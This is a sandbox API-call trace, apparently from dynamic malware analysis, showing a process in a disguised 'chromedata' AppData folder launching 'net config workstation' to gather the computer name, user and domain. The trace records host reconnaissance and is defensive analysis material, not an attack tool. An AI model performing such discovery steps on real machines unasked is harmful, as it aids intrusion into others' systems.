	[0228.630] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1af13c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af13c) returned 0xffffffff
	[0228.630] GetLastError () returned 0x2
	[0228.630] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\net", fInfoLevelId=0x1, lpFindFileData=0x1af13c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af13c) returned 0xffffffff
	[0228.631] GetLastError () returned 0x2
	[0228.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0228.631] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1af13c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af13c) returned 0xffffffff
	[0228.631] GetLastError () returned 0x2
	[0228.631] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\net", fInfoLevelId=0x1, lpFindFileData=0x1af13c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af13c) returned 0xffffffff
	[0228.631] GetLastError () returned 0x2
	[0228.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0228.631] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1af13c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af13c) returned 0x2e2fe0
	[0228.632] GetProcessHeap () returned 0x2d0000
	[0228.632] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x2e3020
	[0228.632] FindClose (in: hFindFile=0x2e2fe0 | out: hFindFile=0x2e2fe0) returned 1
	[0228.632] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x1af13c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af13c) returned 0xffffffff
	[0228.632] GetLastError () returned 0x2
	[0228.632] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x1af13c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af13c) returned 0x2e2fe0
	[0228.632] GetProcessHeap () returned 0x2d0000
	[0228.632] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e3020, Size=0x4) returned 0x2e3020
	[0228.632] FindClose (in: hFindFile=0x2e2fe0 | out: hFindFile=0x2e2fe0) returned 1
	[0228.632] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0228.632] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0228.632] GetConsoleTitleW (in: lpConsoleTitle=0x1af634, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0228.633] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af4bc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af584 | out: lpAttributeList=0x1af4bc, lpSize=0x1af584) returned 1
	[0228.633] UpdateProcThreadAttribute (in: lpAttributeList=0x1af4bc, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af57c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af4bc, lpPreviousValue=0x0) returned 1
	[0228.633] GetStartupInfoW (in: lpStartupInfo=0x1af478 | out: lpStartupInfo=0x1af478*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x150, hStdOutput=0x15c, hStdError=0x15c)) 
	[0228.633] GetProcessHeap () returned 0x2d0000
	[0228.633] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x18) returned 0x2e2fe0
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0228.633] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0228.634] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0228.634] GetProcessHeap () returned 0x2d0000
	[0228.634] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e2fe0 | out: hHeap=0x2d0000) returned 1
	[0228.634] GetProcessHeap () returned 0x2d0000
	[0228.634] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa) returned 0x2dd570
	[0228.634] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1
	[0228.644] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net  config workstation", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpStartupInfo=0x1af518*(cb=0x48, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="net  config workstation", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af564 | out: lpCommandLine="net  config workstation", lpProcessInformation=0x1af564*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd4c, dwThreadId=0x918)) returned 1
	[0228.655] CloseHandle (hObject=0x4c) returned 1
	[0228.655] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0228.655] GetProcessHeap () returned 0x2d0000
	[0228.655] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e1f00 | out: hHeap=0x2d0000) returned 1
	[0228.655] GetEnvironmentStringsW () returned 0x2e1f00*
	[0228.655] GetProcessHeap () returned 0x2d0000
	[0228.655] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x97c) returned 0x2e01d0
	[0228.655] FreeEnvironmentStringsW (penv=0x2e1f00) returned 1
	[0228.655] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0229.256] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af458 | out: lpExitCode=0x1af458*=0x0) returned 1
	[0229.256] CloseHandle (hObject=0x50) returned 1
	[0229.256] _vsnwprintf (in: _Buffer=0x1af5a0, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af464 | out: _Buffer="00000000") returned 8
	[0229.256] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0229.256] GetProcessHeap () returned 0x2d0000
	[0229.256] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e01d0 | out: hHeap=0x2d0000) returned 1
	[0229.256] GetEnvironmentStringsW () returned 0x2e3030*
	[0229.256] GetProcessHeap () returned 0x2d0000
	[0229.256] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x9a2) returned 0x2e01d0
	[0229.256] FreeEnvironmentStringsW (penv=0x2e3030) returned 1
	[0229.256] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0229.256] GetProcessHeap () returned 0x2d0000
	[0229.256] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e01d0 | out: hHeap=0x2d0000) returned 1
	[0229.256] GetEnvironmentStringsW () returned 0x2e3030*
	[0229.256] GetProcessHeap () returned 0x2d0000
	[0229.256] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x9a2) returned 0x2e01d0
	[0229.256] FreeEnvironmentStringsW (penv=0x2e3030) returned 1
	[0229.256] GetProcessHeap () returned 0x2d0000
	[0229.256] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2dd570 | out: hHeap=0x2d0000) returned 1
	[0229.256] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af4bc | out: lpAttributeList=0x1af4bc) 
	[0229.256] _get_osfhandle (_FileHandle=1) returned 0x15c
	[0229.256] SetConsoleMode (hConsoleHandle=0x15c, dwMode=0x0) returned 0
	[0229.256] _get_osfhandle (_FileHandle=1) returned 0x15c
	[0229.256] GetConsoleMode (in: hConsoleHandle=0x15c, lpMode=0x4a3e41ac | out: lpMode=0x4a3e41ac) returned 0
	[0229.257] _get_osfhandle (_FileHandle=0) returned 0x150
	[0229.257] GetConsoleMode (in: hConsoleHandle=0x150, lpMode=0x4a3e41b0 | out: lpMode=0x4a3e41b0) returned 0
	[0229.257] GetConsoleOutputCP () returned 0x1b5
	[0229.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3e4260 | out: lpCPInfo=0x4a3e4260) returned 1
	[0229.257] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0229.257] exit (_Code=0) 

Process:
	id = "48"
	image_name = "net.exe"
	filename = "c:\\windows\\system32\\net.exe"
	page_root = "0x7ee17740"
	os_pid = "0xd4c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "47"
	os_parent_pid = "0xa50"
	cmd_line = "net  config workstation"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 313
	os_tid = 0x918


Process:
	id = "49"
	image_name = "net1.exe"
	filename = "c:\\windows\\system32\\net1.exe"
	page_root = "0x7ee17720"
	os_pid = "0x3dc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "48"
	os_parent_pid = "0xd4c"
	cmd_line = "C:\\Windows\\system32\\net1  config workstation"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 314
	os_tid = 0x87c

	[0229.191] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb38 | out: lpSystemTimeAsFileTime=0x19fb38*(dwLowDateTime=0x70726d00, dwHighDateTime=0x1d50a6a)) 
	[0229.191] GetCurrentProcessId () returned 0x3dc
	[0229.191] GetCurrentThreadId () returned 0x87c
	[0229.191] GetTickCount () returned 0xa8f6df
	[0229.191] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb30 | out: lpPerformanceCount=0x19fb30*=30302875396) returned 1
	[0229.191] GetModuleHandleA (lpModuleName=0x0) returned 0x440000
	[0229.191] __set_app_type (_Type=0x1) 
	[0229.191] __p__fmode () returned 0x770231f4
	[0229.191] __p__commode () returned 0x770231fc
	[0229.191] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x44ffe6) returned 0x0
	[0229.191] __getmainargs (in: _Argc=0x459064, _Argv=0x45906c, _Env=0x459068, _DoWildCard=0, _StartInfo=0x459024 | out: _Argc=0x459064, _Argv=0x45906c, _Env=0x459068) returned 0
	[0229.192] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0229.192] GetConsoleOutputCP () returned 0x1b5
	[0229.192] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x459080 | out: lpCPInfo=0x459080) returned 1
	[0229.192] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0229.193] sprintf_s (in: _DstBuf=0x19faf0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4
	[0229.194] setlocale (category=0, locale=".437") returned="English_United States.437"
	[0229.195] GetStdHandle (nStdHandle=0xfffffff5) returned 0x15c
	[0229.195] GetStdHandle (nStdHandle=0xfffffff4) returned 0x15c
	[0229.196] GetCommandLineW () returned="C:\\Windows\\system32\\net1  config workstation"
	[0229.196] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f8bc, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c
	[0229.196] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x64) returned 0x2e29e8
	[0229.197] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x19fac0 | out: Buffer=0x19fac0*=0x2de580) returned 0x0
	[0229.197] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x19fac0 | out: Buffer=0x19fac0*=0x2de598) returned 0x0
	[0229.197] _fileno (_File=0x77022900) returned 0
	[0229.197] _setmode (_FileHandle=0, _Mode=16384) returned 16384
	[0229.197] _wcsicmp (_String1="accounts", _String2="config") returned -2
	[0229.197] _wcsicmp (_String1="computer", _String2="config") returned -1
	[0229.197] _wcsicmp (_String1="config", _String2="config") returned 0
	[0229.197] _wcsicmp (_String1="accounts", _String2="workstation") returned -22
	[0229.197] _wcsicmp (_String1="computer", _String2="workstation") returned -20
	[0229.197] _wcsicmp (_String1="config", _String2="workstation") returned -20
	[0229.197] _wcsicmp (_String1="continue", _String2="workstation") returned -20
	[0229.197] _wcsicmp (_String1="cont", _String2="workstation") returned -20
	[0229.197] _wcsicmp (_String1="file", _String2="workstation") returned -17
	[0229.197] _wcsicmp (_String1="files", _String2="workstation") returned -17
	[0229.197] _wcsicmp (_String1="group", _String2="workstation") returned -16
	[0229.197] _wcsicmp (_String1="groups", _String2="workstation") returned -16
	[0229.197] _wcsicmp (_String1="help", _String2="workstation") returned -15
	[0229.197] _wcsicmp (_String1="helpmsg", _String2="workstation") returned -15
	[0229.197] _wcsicmp (_String1="localgroup", _String2="workstation") returned -11
	[0229.197] _wcsicmp (_String1="pause", _String2="workstation") returned -7
	[0229.197] _wcsicmp (_String1="session", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="sessions", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="sess", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="share", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="start", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="stats", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="statistics", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="stop", _String2="workstation") returned -4
	[0229.197] _wcsicmp (_String1="time", _String2="workstation") returned -3
	[0229.197] _wcsicmp (_String1="user", _String2="workstation") returned -2
	[0229.198] _wcsicmp (_String1="users", _String2="workstation") returned -2
	[0229.198] _wcsicmp (_String1="msg", _String2="workstation") returned -10
	[0229.198] _wcsicmp (_String1="messenger", _String2="workstation") returned -10
	[0229.198] _wcsicmp (_String1="receiver", _String2="workstation") returned -5
	[0229.198] _wcsicmp (_String1="rcv", _String2="workstation") returned -5
	[0229.198] _wcsicmp (_String1="netpopup", _String2="workstation") returned -9
	[0229.198] _wcsicmp (_String1="redirector", _String2="workstation") returned -5
	[0229.198] _wcsicmp (_String1="redir", _String2="workstation") returned -5
	[0229.198] _wcsicmp (_String1="rdr", _String2="workstation") returned -5
	[0229.198] _wcsicmp (_String1="workstation", _String2="workstation") returned 0
	[0229.198] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e3590
	[0229.201] GetServiceKeyNameW (in: hSCManager=0x2e3590, lpDisplayName="workstation", lpServiceName=0x45aaf0, lpcchBuffer=0x19fa60 | out: lpServiceName="LanmanWorkstation", lpcchBuffer=0x19fa60) returned 1
	[0229.202] _wcsicmp (_String1="msg", _String2="LanmanWorkstation") returned 1
	[0229.202] _wcsicmp (_String1="messenger", _String2="LanmanWorkstation") returned 1
	[0229.202] _wcsicmp (_String1="receiver", _String2="LanmanWorkstation") returned 6
	[0229.202] _wcsicmp (_String1="rcv", _String2="LanmanWorkstation") returned 6
	[0229.202] _wcsicmp (_String1="redirector", _String2="LanmanWorkstation") returned 6
	[0229.202] _wcsicmp (_String1="redir", _String2="LanmanWorkstation") returned 6
	[0229.202] _wcsicmp (_String1="rdr", _String2="LanmanWorkstation") returned 6
	[0229.202] _wcsicmp (_String1="workstation", _String2="LanmanWorkstation") returned 11
	[0229.202] _wcsicmp (_String1="work", _String2="LanmanWorkstation") returned 11
	[0229.202] _wcsicmp (_String1="wksta", _String2="LanmanWorkstation") returned 11
	[0229.202] _wcsicmp (_String1="prdr", _String2="LanmanWorkstation") returned 4
	[0229.202] _wcsicmp (_String1="devrdr", _String2="LanmanWorkstation") returned -8
	[0229.202] _wcsicmp (_String1="lanmanworkstation", _String2="LanmanWorkstation") returned 0
	[0229.204] NetWkstaGetInfo (in: servername=0x0, level=0x65, bufptr=0x19f7ec | out: bufptr=0x19f7ec) returned 0x0
	[0229.211] NetWkstaUserGetInfo (in: reserved=0x0, level=0x1, bufptr=0x19f7e4 | out: bufptr=0x2deb40*(wkui1_username="2XC7u663GxWc", wkui1_logon_domain="ZGW5TDPU", wkui1_oth_domains="", wkui1_logon_server="ZGW5TDPU")) returned 0x0
	[0229.212] NetWkstaGetInfo (in: servername=0x0, level=0x1f6, bufptr=0x19f7e0 | out: bufptr=0x19f7e0) returned 0x0
	[0229.213] NetapipBufferAllocate () returned 0x0
	[0229.213] wcscpy_s (in: _Destination=0x2e9d7a, _SizeInWords=0x1, _Source="" | out: _Destination="") returned 0x0
	[0229.213] wcscpy_s (in: _Destination=0x2e9d68, _SizeInWords=0x9, _Source="ZGW5TDPU" | out: _Destination="ZGW5TDPU") returned 0x0
	[0229.213] wcscpy_s (in: _Destination=0x2e9d54, _SizeInWords=0xa, _Source="WORKGROUP" | out: _Destination="WORKGROUP") returned 0x0
	[0229.213] wcscpy_s (in: _Destination=0x2e9d3a, _SizeInWords=0xd, _Source="2XC7u663GxWc" | out: _Destination="2XC7u663GxWc") returned 0x0
	[0229.213] wcscpy_s (in: _Destination=0x2e9d28, _SizeInWords=0x9, _Source="ZGW5TDPU" | out: _Destination="ZGW5TDPU") returned 0x0
	[0229.213] NetApiBufferFree (Buffer=0x2e8460) returned 0x0
	[0229.213] NetApiBufferFree (Buffer=0x2deb40) returned 0x0
	[0229.213] NetApiBufferFree (Buffer=0x2e9330) returned 0x0
	[0229.213] NetApiBufferFree (Buffer=0x2e9c98) returned 0x0
	[0229.213] NetWkstaGetInfo (in: servername=0x0, level=0x65, bufptr=0x19f80c | out: bufptr=0x19f80c) returned 0x0
	[0229.213] NetWkstaUserGetInfo (in: reserved=0x0, level=0x1, bufptr=0x19f804 | out: bufptr=0x2deb40*(wkui1_username="2XC7u663GxWc", wkui1_logon_domain="ZGW5TDPU", wkui1_oth_domains="", wkui1_logon_server="ZGW5TDPU")) returned 0x0
	[0229.214] NetWkstaGetInfo (in: servername=0x0, level=0x1f6, bufptr=0x19f800 | out: bufptr=0x19f800) returned 0x0
	[0229.214] NetapipBufferAllocate () returned 0x0
	[0229.214] wcscpy_s (in: _Destination=0x2e9d8e, _SizeInWords=0x1, _Source="" | out: _Destination="") returned 0x0
	[0229.214] wcscpy_s (in: _Destination=0x2e9d7c, _SizeInWords=0x9, _Source="ZGW5TDPU" | out: _Destination="ZGW5TDPU") returned 0x0
	[0229.214] wcscpy_s (in: _Destination=0x2e9d68, _SizeInWords=0xa, _Source="WORKGROUP" | out: _Destination="WORKGROUP") returned 0x0
	[0229.214] wcscpy_s (in: _Destination=0x2e9d4e, _SizeInWords=0xd, _Source="2XC7u663GxWc" | out: _Destination="2XC7u663GxWc") returned 0x0
	[0229.214] wcscpy_s (in: _Destination=0x2e9d3c, _SizeInWords=0x9, _Source="ZGW5TDPU" | out: _Destination="ZGW5TDPU") returned 0x0
	[0229.214] wcscpy_s (in: _Destination=0x2e9d2a, _SizeInWords=0x9, _Source="ZGW5TDPU" | out: _Destination="ZGW5TDPU") returned 0x0
	[0229.215] wcscpy_s (in: _Destination=0x2e9d28, _SizeInWords=0x1, _Source="" | out: _Destination="") returned 0x0
	[0229.215] NetApiBufferFree (Buffer=0x2e8460) returned 0x0
	[0229.215] NetApiBufferFree (Buffer=0x2deb40) returned 0x0
	[0229.215] NetApiBufferFree (Buffer=0x2e9330) returned 0x0
	[0229.215] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x19f858, nSize=0x19f844 | out: lpBuffer="ZgW5tdPu", nSize=0x19f844) returned 1
	[0229.215] DsRoleGetPrimaryDomainInformation () returned 0x0
	[0229.216] malloc (_Size=0x100) returned 0xce9c8
	[0229.216] wcscpy_s (in: _Destination=0x462400, _SizeInWords=0x101, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0
	[0229.216] wcscpy_s (in: _Destination=0x462608, _SizeInWords=0x101, _Source="BASE" | out: _Destination="BASE") returned 0x0
	[0229.216] wcscpy_s (in: _Destination=0x45a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0
	[0229.216] LoadLibraryW (lpLibFileName="NETMSG") returned 0x72190000
	[0229.218] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1162, dwLanguageId=0x0, lpBuffer=0xce9c8, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Computer name") returned 0xd
	[0229.219] GetConsoleOutputCP () returned 0x1b5
	[0229.219] GetConsoleOutputCP () returned 0x1b5
	[0229.219] malloc (_Size=0x100) returned 0xcead0
	[0229.220] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1174, dwLanguageId=0x0, lpBuffer=0xcead0, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Full Computer name") returned 0x12
	[0229.220] GetConsoleOutputCP () returned 0x1b5
	[0229.220] GetConsoleOutputCP () returned 0x1b5
	[0229.220] malloc (_Size=0x100) returned 0xcebd8
	[0229.220] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1163, dwLanguageId=0x0, lpBuffer=0xcebd8, nSize=0x7f, Arguments=0x0 | out: lpBuffer="User name") returned 0x9
	[0229.220] GetConsoleOutputCP () returned 0x1b5
	[0229.220] GetConsoleOutputCP () returned 0x1b5
	[0229.220] malloc (_Size=0x100) returned 0xcece0
	[0229.220] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1164, dwLanguageId=0x0, lpBuffer=0xcece0, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Software version") returned 0x10
	[0229.220] GetConsoleOutputCP () returned 0x1b5
	[0229.220] GetConsoleOutputCP () returned 0x1b5
	[0229.220] malloc (_Size=0x100) returned 0xcede8
	[0229.220] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1166, dwLanguageId=0x0, lpBuffer=0xcede8, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Windows NT root directory") returned 0x19
	[0229.221] GetConsoleOutputCP () returned 0x1b5
	[0229.221] GetConsoleOutputCP () returned 0x1b5
	[0229.221] malloc (_Size=0x100) returned 0xceef0
	[0229.221] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1167, dwLanguageId=0x0, lpBuffer=0xceef0, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Workstation domain") returned 0x12
	[0229.221] GetConsoleOutputCP () returned 0x1b5
	[0229.221] GetConsoleOutputCP () returned 0x1b5
	[0229.221] malloc (_Size=0x100) returned 0xceff8
	[0229.221] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1168, dwLanguageId=0x0, lpBuffer=0xceff8, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Logon domain") returned 0xc
	[0229.221] GetConsoleOutputCP () returned 0x1b5
	[0229.221] GetConsoleOutputCP () returned 0x1b5
	[0229.221] malloc (_Size=0x100) returned 0xcf100
	[0229.221] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x1175, dwLanguageId=0x0, lpBuffer=0xcf100, nSize=0x7f, Arguments=0x0 | out: lpBuffer="Workstation Domain DNS Name") returned 0x1b
	[0229.221] GetConsoleOutputCP () returned 0x1b5
	[0229.222] GetConsoleOutputCP () returned 0x1b5
	[0229.222] malloc (_Size=0x100) returned 0xcf208
	[0229.222] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x116a, dwLanguageId=0x0, lpBuffer=0xcf208, nSize=0x7f, Arguments=0x0 | out: lpBuffer="COM Open Timeout (sec)") returned 0x16
	[0229.222] GetConsoleOutputCP () returned 0x1b5
	[0229.222] GetConsoleOutputCP () returned 0x1b5
	[0229.222] malloc (_Size=0x100) returned 0xcf310
	[0229.222] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x72190000, dwMessageId=0x116b, dwLanguageId=0x0, lpBuffer=0xcf310, nSize=0x7f, Arguments=0x0 | out: lpBuffer="COM Send Count (byte)") returned 0x15
	[0229.222] GetConsoleOutputCP () returned 0x1b5
